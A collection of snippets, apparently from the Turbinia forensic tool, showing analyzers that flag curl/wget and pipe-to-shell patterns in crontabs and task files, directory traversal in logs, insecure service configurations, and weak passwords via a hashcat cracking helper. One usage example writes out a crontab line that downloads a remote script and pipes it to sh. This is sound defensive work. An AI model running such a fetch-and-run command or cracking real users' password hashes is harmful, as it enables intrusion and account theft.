Example #1
  def _AnalyzeHadoopAppRoot(self, collected_artifacts, output_dir):
    """Runs a naive AppRoot files parsing method.

    This extracts strings from the saved task file, and searches for usual
    post-compromise suspicious patterns.

    TODO: properly parse the Proto. Some documentation can be found over there:
    https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto

    Args:
      collected_artifacts(list(str)): a list of paths to extracted files
      output_dir(str): The base directory the artifacts are in.

    Returns:
      Tuple(
        list(str): The report data as a list of lines
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    report = []
    evil_commands = []
    strings_count = 0
    priority = Priority.MEDIUM
    summary = ''
    for filepath in collected_artifacts:
      relpath = os.path.relpath(filepath, output_dir)
      command = 'strings -a "{0:s}"'.format(filepath)
      log.debug('Running command [{0:s}]'.format(command))
      proc = subprocess.Popen(
          command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
      strings_output, _ = proc.communicate()
      strings_output = codecs.decode(strings_output, 'utf-8')
      for line in strings_output.splitlines():
        strings_count += 1
        if 'curl' in line or 'wget' in line:
          evil_commands.append((relpath, line))

    if evil_commands:
      msg = 'Found suspicious commands!'
      report.append(fmt.heading4(fmt.bold(msg)))
      summary = msg
      priority = Priority.CRITICAL
    else:
      msg = 'Did not find any suspicious commands.'
      report.append(fmt.heading4(msg))
      summary = msg

    for filepath, command in evil_commands:
      report.append(fmt.bullet(fmt.bold('Command:')))
      report.append(fmt.code(command))
      report.append('Found in file:')
      report.append(fmt.code(filepath))

    msg = 'Extracted {0:d} strings from {1:d} file(s)'.format(
        strings_count, len(collected_artifacts))
    report.append(fmt.bullet(msg))

    return (report, priority, summary)
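A note on the strings invocation above: because filepath is interpolated into a shell command string, a quote character in a file name could break the call. A sketch of an equivalent invocation without shell=True (assuming, as above, that GNU strings is on PATH):

      # Hypothetical variant: pass an argument list instead of a shell string,
      # so the file name needs no quoting.
      proc = subprocess.run(
          ['strings', '-a', filepath], stdout=subprocess.PIPE,
          stderr=subprocess.STDOUT, check=False)
      strings_output = codecs.decode(proc.stdout, 'utf-8')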
Example #2
    def analyze_jenkins(version, credentials, timeout=300):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): A list of (username, password hash) tuples.
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }

        # '3200' is "bcrypt $2*$, Blowfish (Unix)"
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys(),
            tmp_dir=None,
            timeout=timeout,
            extra_args='-m 3200')

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
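bruteforce_password_hashes is not defined on this page. A minimal sketch of what such a helper might look like, assuming hashcat is installed and a wordlist exists at a known path; the flags used (-a 0, --runtime, --potfile-path, plus -m and --username arriving via extra_args) are documented hashcat options, but everything else here is an assumption rather than the project's actual implementation:

    import os
    import subprocess
    import tempfile

    def bruteforce_password_hashes(hashes, tmp_dir=None, timeout=300,
                                   extra_args=''):
        """Sketch: cracks hashes with hashcat, returns (hash, plaintext) pairs."""
        with tempfile.TemporaryDirectory(dir=tmp_dir) as workdir:
            hash_file = os.path.join(workdir, 'hashes.txt')
            pot_file = os.path.join(workdir, 'hashcat.pot')
            with open(hash_file, 'w') as out:
                out.write('\n'.join(hashes))
            command = ['hashcat', '--force', '-a', '0',
                       '--runtime={0:d}'.format(timeout),
                       '--potfile-path={0:s}'.format(pot_file)]
            command.extend(extra_args.split())
            command.extend([hash_file, '/usr/share/wordlists/rockyou.txt'])
            # hashcat exits non-zero when nothing cracks, so ignore the return
            # code and read whatever landed in the potfile (hash:plaintext).
            subprocess.run(command, capture_output=True, check=False)
            weak = []
            if os.path.exists(pot_file):
                with open(pot_file, 'r') as pot:
                    for line in pot:
                        password_hash, _, plaintext = (
                            line.rstrip('\n').rpartition(':'))
                        weak.append((password_hash, plaintext))
        return weak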
Example #3
    def analyze_jenkins(version, credentials):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): A list of (username, password hash) tuples.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }
        # TODO: Add timeout parameter when dynamic configuration is ready.
        # Ref: https://github.com/google/turbinia/issues/244
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys())

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Example #4
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        # TODO(dfjxs): Use evidence name instead of evidence_description (#718)
        evidence_description = None
        if hasattr(evidence, 'embedded_path'):
            evidence_description = ':'.join(
                (evidence.disk_name, evidence.embedded_path))
        elif hasattr(evidence, 'disk_name'):
            evidence_description = evidence.disk_name
        else:
            evidence_description = evidence.source_path

        result.log(
            'Scanning [{0:s}] for partitions'.format(evidence_description))

        success = False

        dfvfs_definitions.PREFERRED_GPT_BACK_END = (
            dfvfs_definitions.TYPE_INDICATOR_GPT)
        mediator = dfvfs_classes.UnattendedVolumeScannerMediator()
        path_specs = []
        try:
            scanner = volume_scanner.VolumeScanner(mediator=mediator)
            path_specs = scanner.GetBasePathSpecs(evidence.local_path)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence_description)
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log(
            'Scanning of [{0:s}] is complete'.format(evidence_description))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result
Example #5
    def analyse_crontab(self, crontab):
        """Analyses a Cron file.

    Args:
      crontab (str): file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        wget_or_curl = re.compile(r'(wget|curl)', re.IGNORECASE | re.MULTILINE)
        pipe_to_sh = re.compile(r'\|(.*)sh ', re.IGNORECASE | re.MULTILINE)
        get_piped_to_sh = re.compile(r'((wget|curl).*\|)+(.*sh)',
                                     re.IGNORECASE | re.MULTILINE)

        if re.search(get_piped_to_sh, crontab):
            findings.append(
                fmt.bullet('Remote file retrieval piped to a shell.'))
        elif re.search(wget_or_curl, crontab):
            findings.append(fmt.bullet('Remote file retrieval'))
        elif re.search(pipe_to_sh, crontab):
            findings.append(fmt.bullet('File piped to shell'))

        if findings:
            summary = 'Potentially backdoored crontab found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in crontabs'
        return (report, Priority.LOW, report)
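For illustration, a crontab line that fetches a remote script and pipes it to a shell trips the first (highest-signal) pattern. Hypothetical values; task stands in for an instance of the class this method belongs to:

    crontab = '*/5 * * * * root curl -s http://203.0.113.7/x.sh | sh'
    report, priority, summary = task.analyse_crontab(crontab)
    # priority == Priority.HIGH
    # summary == 'Potentially backdoored crontab found.'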
Example #6
    def _is_traversal_in_logs(self, result, basedir, logfiles):
        """Checks to see if there is evidence of directory traversal in the logs.

    Args:
      result (TurbiniaTaskResult): The object to place task results into.
      basedir (str): the root of the evidence.
      logfiles (str): The file(s) to check

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """

        check = " ".join(glob.glob(os.path.join(basedir, logfiles)))
        if not check:
            return ('', Priority.LOW, '')

        cmd = ['zgrep', '"%2F..%2F..%2F..%2F"', check]
        ret, result = self.execute(cmd, result, success_codes=[0, 1])
        if ret == 0:
            summary = 'directory traversal exploit detected in {}'.format(
                logfiles)
            report = fmt.heading4(fmt.bold(summary))
            return (report, Priority.HIGH, summary)

        return ('', Priority.LOW, '')
Example #7
 def analyse_shadow_file(self, shadow, hashes):
   """Analyses a Linux shadow file.
   Args:
     shadow (list): shadow file content (list of str).
     hashes (dict): dict of hashes to usernames
   Returns:
     Tuple(
       report_text(str): The report data
       report_priority(int): The priority of the report (0 - 100)
       summary(str): A summary of the report (used for task status)
     )
   """
   report = []
   summary = 'No weak passwords found'
   priority = Priority.LOW
   weak_passwords = bruteforce_password_hashes(shadow)
   if weak_passwords:
     priority = Priority.CRITICAL
     summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
         len(weak_passwords))
     report.insert(0, fmt.heading4(fmt.bold(summary)))
     line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
     report.append(fmt.bullet(fmt.bold(line)))
     for password_hash, plaintext in weak_passwords:
       line = """User '{0:s}' with password '{1:s}'""".format(
           hashes[password_hash], plaintext)
       report.append(fmt.bullet(line, level=2))
   report = '\n'.join(report)
   return (report, priority, summary)
Example #8
  def analyse_redis_config(self, config):
    """Analyses a Redis configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    findings = []
    bind_everywhere_re = re.compile(
        r'^\s*bind[\s"]*0\.0\.0\.0', re.IGNORECASE | re.MULTILINE)

    if re.search(bind_everywhere_re, config):
      findings.append(fmt.bullet('Redis listening on every IP'))

    if findings:
      summary = 'Insecure Redis configuration found.'
      findings.insert(0, fmt.heading4(fmt.bold(summary)))
      report = '\n'.join(findings)
      return (report, Priority.HIGH, summary)

    report = 'No issues found in Redis configuration'
    return (report, Priority.LOW, report)
Example #9
    def testPartitionEnumerationRunAPFS(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on APFS."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'apfs.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_apfs_container_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER,
            location='/apfs1',
            volume_index=0,
            parent=test_raw_path_spec)

        mock_getbasepathspecs.return_value = [test_apfs_container_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure the run method produced the expected report data.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/apfs1:'))
        expected_report.append(fmt.bullet('Volume index: 0'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #10
    def testPartitionEnumerationRunLVM(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on LVM."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'lvm.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_lvm_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_LVM,
            location='/lvm1',
            parent=test_raw_path_spec)
        test_xfs_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_XFS,
            location='/',
            parent=test_lvm_path_spec)

        mock_getbasepathspecs.return_value = [test_xfs_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure the run method produced the expected report data.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/lvm1:'))
        expected_report.append(fmt.bullet('Source evidence is a volume image'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #11
    def analyse_config(self, jupyter_config):
        """Extract security related configs from Jupyter configuration files.

    Args:
      jupyter_config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        num_misconfigs = 0
        for line in jupyter_config.split('\n'):

            if all(x in line for x in ['disable_check_xsrf', 'True']):
                findings.append(fmt.bullet('XSRF protection is disabled.'))
                num_misconfigs += 1
                continue
            if all(x in line for x in ['allow_root', 'True']):
                findings.append(
                    fmt.bullet('Jupyter Notebook allowed to run as root.'))
                num_misconfigs += 1
                continue
            if 'NotebookApp.password' in line:
                if all(x in line for x in ['required', 'False']):
                    findings.append(
                        fmt.bullet(
                            'Password is not required to access this Jupyter Notebook.'
                        ))
                    num_misconfigs += 1
                    continue
                if 'required' not in line:
                    password_hash = line.split('=')
                    if len(password_hash) > 1:
                        if password_hash[1].strip() == "''":
                            findings.append(
                                fmt.bullet(
                                    'There is no password set for this Jupyter Notebook.'
                                ))
                            num_misconfigs += 1
            if all(x in line for x in ['allow_remote_access', 'True']):
                findings.append(
                    fmt.bullet(
                        'Remote access is enabled on this Jupyter Notebook.'))
                num_misconfigs += 1
                continue

        if findings:
            summary = 'Insecure Jupyter Notebook configuration found. Total misconfigs: {}'.format(
                num_misconfigs)
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in Jupyter Notebook configuration.'
        return (report, Priority.LOW, report)
Example #12
    def analyze_wp_access_logs(self, config):
        """Analyses access logs containing Wordpress traffic.

    Args:
      config (str): access log file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        findings_summary = set()

        for log_line in config.split('\n'):

            if self.install_step_regex.search(log_line):
                line = '{0:s}: Wordpress installation successful'.format(
                    self._get_timestamp(log_line))
                report.append(fmt.bullet(line))
                findings_summary.add('install')

            match = self.theme_editor_regex.search(log_line)
            if match:
                line = '{0:s}: Wordpress theme editor edited file ({1:s})'.format(
                    self._get_timestamp(log_line), match.group('edited_file'))
                report.append(fmt.bullet(line))
                findings_summary.add('theme_edit')

        if report:
            findings_summary = ', '.join(sorted(list(findings_summary)))
            summary = 'Wordpress access logs found ({0:s})'.format(
                findings_summary)

            report.insert(0, fmt.heading4(fmt.bold(summary)))
            report_text = '\n'.join(report)
            return (report_text, Priority.HIGH, summary)

        report_text = 'No Wordpress install or theme editing found in access logs'
        return (fmt.heading4(report_text), Priority.LOW, report_text)
Example #13
 def testFormatting(self):
     """Test text formatting."""
     self.assertEqual('**testing**', fmt.bold(self.test_string))
     self.assertEqual('# testing', fmt.heading1(self.test_string))
     self.assertEqual('## testing', fmt.heading2(self.test_string))
     self.assertEqual('### testing', fmt.heading3(self.test_string))
     self.assertEqual('#### testing', fmt.heading4(self.test_string))
     self.assertEqual('##### testing', fmt.heading5(self.test_string))
     self.assertEqual('* testing', fmt.bullet(self.test_string))
     self.assertEqual('        * testing',
                      fmt.bullet(self.test_string, level=3))
     self.assertEqual('`testing`', fmt.code(self.test_string))
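The fmt helpers exercised by this test are thin Markdown wrappers. A minimal implementation consistent with these assertions (a sketch; the project's real formatter module may differ in details such as whitespace handling):

    def bold(text):
        """Wraps text in Markdown bold markers."""
        return '**{0:s}**'.format(text)

    def _heading(text, level):
        """Builds a Markdown heading of the given level."""
        return '{0:s} {1:s}'.format('#' * level, text)

    def heading1(text):
        return _heading(text, 1)

    def heading2(text):
        return _heading(text, 2)

    def heading3(text):
        return _heading(text, 3)

    def heading4(text):
        return _heading(text, 4)

    def heading5(text):
        return _heading(text, 5)

    def bullet(text, level=1):
        """Builds a list item, indented four spaces per nesting level."""
        return '{0:s}* {1:s}'.format('    ' * (level - 1), text)

    def code(text):
        """Wraps text in inline-code backticks."""
        return '`{0:s}`'.format(text)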
Example #14
    def analyse_tomcat_file(self, tomcat_file):
        """Analyse a Tomcat file.

    - Search for clear text password entries in user configuration file
    - Search for .war deployment
    - Search for management control panel activity

    Args:
      tomcat_file (str): Tomcat file content.
    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []

        tomcat_user_passwords_re = re.compile('(^.*password.*)', re.MULTILINE)
        tomcat_deploy_re = re.compile(
            '(^.*Deploying web application archive.*)', re.MULTILINE)
        tomcat_manager_activity_re = re.compile(
            '(^.*POST /manager/html/upload.*)', re.MULTILINE)

        count = 0
        for password_entry in re.findall(tomcat_user_passwords_re,
                                         tomcat_file):
            findings.append(
                fmt.bullet('Tomcat user: ' + password_entry.strip()))
            count += 1

        for deployment_entry in re.findall(tomcat_deploy_re, tomcat_file):
            findings.append(
                fmt.bullet(
                    'Tomcat App Deployed: ' + deployment_entry.strip()))
            count += 1

        for mgmt_entry in re.findall(tomcat_manager_activity_re, tomcat_file):
            findings.append(
                fmt.bullet('Tomcat Management: ' + mgmt_entry.strip()))
            count += 1

        if findings:
            msg = 'Tomcat analysis found {0:d} results'.format(count)
            findings.insert(0, fmt.heading4(fmt.bold(msg)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, msg)

        report = 'No Tomcat findings to report'
        return (report, Priority.LOW, report)
Example #15
    def testPartitionEnumerationRun(self, mock_getbasepathspecs):
        """Test PartitionEnumeration task run."""
        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location='test.dd')
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p1_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p1',
            part_index=2,
            start_offset=1048576)
        ntfs_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p1_spec,
            location='\\')

        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=11534336)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [ntfs_spec, tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 2)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 2 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p1:'))
        expected_report.append(fmt.bullet('Partition index: 2'))
        expected_report.append(fmt.bullet('Partition offset: 1048576'))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 11534336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
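The expected reports in these tests pin down the reporting half of _ProcessPartition, which is not shown on this page. A sketch reconstructed purely from the assertions (the real method also builds the partition evidence that result.add_evidence receives, elided here; note the base path spec handed to run() is the file-system spec, so the partition attributes live on its parent):

    def _PartitionStatus(partition_path_spec):
        """Sketch: report lines for one TSK partition path spec."""
        status = [fmt.heading5('{0:s}:'.format(partition_path_spec.location))]
        part_index = getattr(partition_path_spec, 'part_index', None)
        start_offset = getattr(partition_path_spec, 'start_offset', None)
        if part_index is not None:
            status.append(
                fmt.bullet('Partition index: {0!s}'.format(part_index)))
        if start_offset is not None:
            status.append(
                fmt.bullet('Partition offset: {0!s}'.format(start_offset)))
        return status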
Example #16
    def run(self, evidence, result):
        """Scan a raw disk for partitions.

    Args:
      evidence (Evidence object):  The evidence we will process.
      result (TurbiniaTaskResult): The object to place task results into.

    Returns:
      TurbiniaTaskResult object.
    """
        result.log('Scanning [{0:s}] for partitions'.format(
            evidence.local_path))

        success = False

        mediator = dfvfs_classes.UnattendedVolumeScannerMediator()
        path_specs = []
        try:
            scanner = volume_scanner.VolumeScanner(mediator=mediator)
            path_specs = scanner.GetBasePathSpecs(evidence.local_path)
            status_summary = 'Found {0:d} partition(s) in [{1:s}]:'.format(
                len(path_specs), evidence.local_path)
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    evidence.local_path, path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log('Scanning of [{0:s}] is complete'.format(
            evidence.local_path))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result
Example #17
  def runLoki(self, result, evidence):
    """Runs the Loki IOC scanner over the evidence and reports alerts.

    Args:
      result (TurbiniaTaskResult): The object to place task results into.
      evidence (Evidence object): The evidence to process.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    log_file = os.path.join(self.output_dir, 'loki.log')
    stdout_file = os.path.join(self.output_dir, 'loki_stdout.log')
    stderr_file = os.path.join(self.output_dir, 'loki_stderr.log')

    cmd = [
        'python', '/opt/loki/loki.py', '-w', '0', '--csv', '--intense',
        '--noprocscan', '--dontwait', '--noindicator', '-l', log_file, '-p',
        evidence.local_path
    ]

    (ret, result) = self.execute(
        cmd, result, log_files=[log_file], stdout_file=stdout_file,
        stderr_file=stderr_file, cwd='/opt/loki/')

    if ret != 0:
      raise TurbiniaException('Return code: {0:d}'.format(ret))

    report = []
    summary = 'No Loki threats found'
    priority = Priority.LOW

    report_lines = []
    with open(stdout_file, 'r') as loki_report_csv:
      lokireader = csv.DictReader(
          loki_report_csv, fieldnames=['Time', 'Hostname', 'Level', 'Log'])
      for row in lokireader:
        if row['Level'] == 'ALERT':
          report_lines.append(row['Log'])

    if report_lines:
      priority = Priority.HIGH
      summary = 'Loki analysis found {0:d} alert(s)'.format(len(report_lines))
      report.insert(0, fmt.heading4(fmt.bold(summary)))
      line = '{0:n} alert(s) found:'.format(len(report_lines))
      report.append(fmt.bullet(fmt.bold(line)))
      for line in report_lines:
        report.append(fmt.bullet(line, level=2))

    report = '\n'.join(report)
    return (report, priority, summary)
Example #18
    def _analyse_wordpress_creds(self, creds, hashnames, timeout=300):
        """Attempt to brute force extracted Wordpress credentials.

    Args:
        creds (list): List of strings containing raw extracted credentials
        hashnames (dict): Dict mapping hash back to username for convenience.
        timeout (int): How long to spend cracking.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 400 is "phpass"
        weak_passwords = bruteforce_password_hashes(
            creds,
            tmp_dir=self.tmp_dir,
            timeout=timeout,
            extra_args='--username -m 400')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Wordpress analysis found {0:d} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                if password_hash in hashnames:
                    line = """User '{0:s}' with password '{1:s}'""".format(
                        hashnames[password_hash], plaintext)
                    report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Example #19
    def testPartitionEnumerationRun(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data',
                                 'tsk_volume_system.raw')

        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=180224)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 1)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 180224'))
        expected_report.append(fmt.bullet('Partition size: 1294336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #20
    def analyse_sshd_config(self, config):
        """Analyses an SSH configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        permit_root_login_re = re.compile(
            r'^\s*PermitRootLogin\s*(yes|prohibit-password|without-password)',
            re.IGNORECASE | re.MULTILINE)
        password_authentication_re = re.compile(
            r'^\s*PasswordAuthentication[\s"]*No',
            re.IGNORECASE | re.MULTILINE)
        permit_empty_passwords_re = re.compile(
            r'^\s*PermitEmptyPasswords[\s"]*Yes', re.IGNORECASE | re.MULTILINE)

        if re.search(permit_root_login_re, config):
            findings.append(fmt.bullet('Root login enabled.'))

        if not re.search(password_authentication_re, config):
            findings.append(fmt.bullet('Password authentication enabled.'))

        if re.search(permit_empty_passwords_re, config):
            findings.append(fmt.bullet('Empty passwords permitted.'))

        if findings:
            summary = 'Insecure SSH configuration found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, 20, summary)

        report = 'No issues found in SSH configuration'
        return (report, 60, report)
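A short usage sketch (hypothetical values; task stands in for an instance of the class this method belongs to). Note the inverted check: a config that never disables password authentication is flagged even though it contains no PasswordAuthentication line at all:

    config = 'PermitRootLogin yes\nPermitEmptyPasswords "Yes"\n'
    report, priority, summary = task.analyse_sshd_config(config)
    # Three findings: root login, password authentication, empty passwords.
    # priority == 20; summary == 'Insecure SSH configuration found.'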
Example #21
    def analyse_shadow_file(self, shadow, hashes, timeout=300):
        """Analyses a Linux shadow file.

    Args:
      shadow (list): shadow file content (list of str).
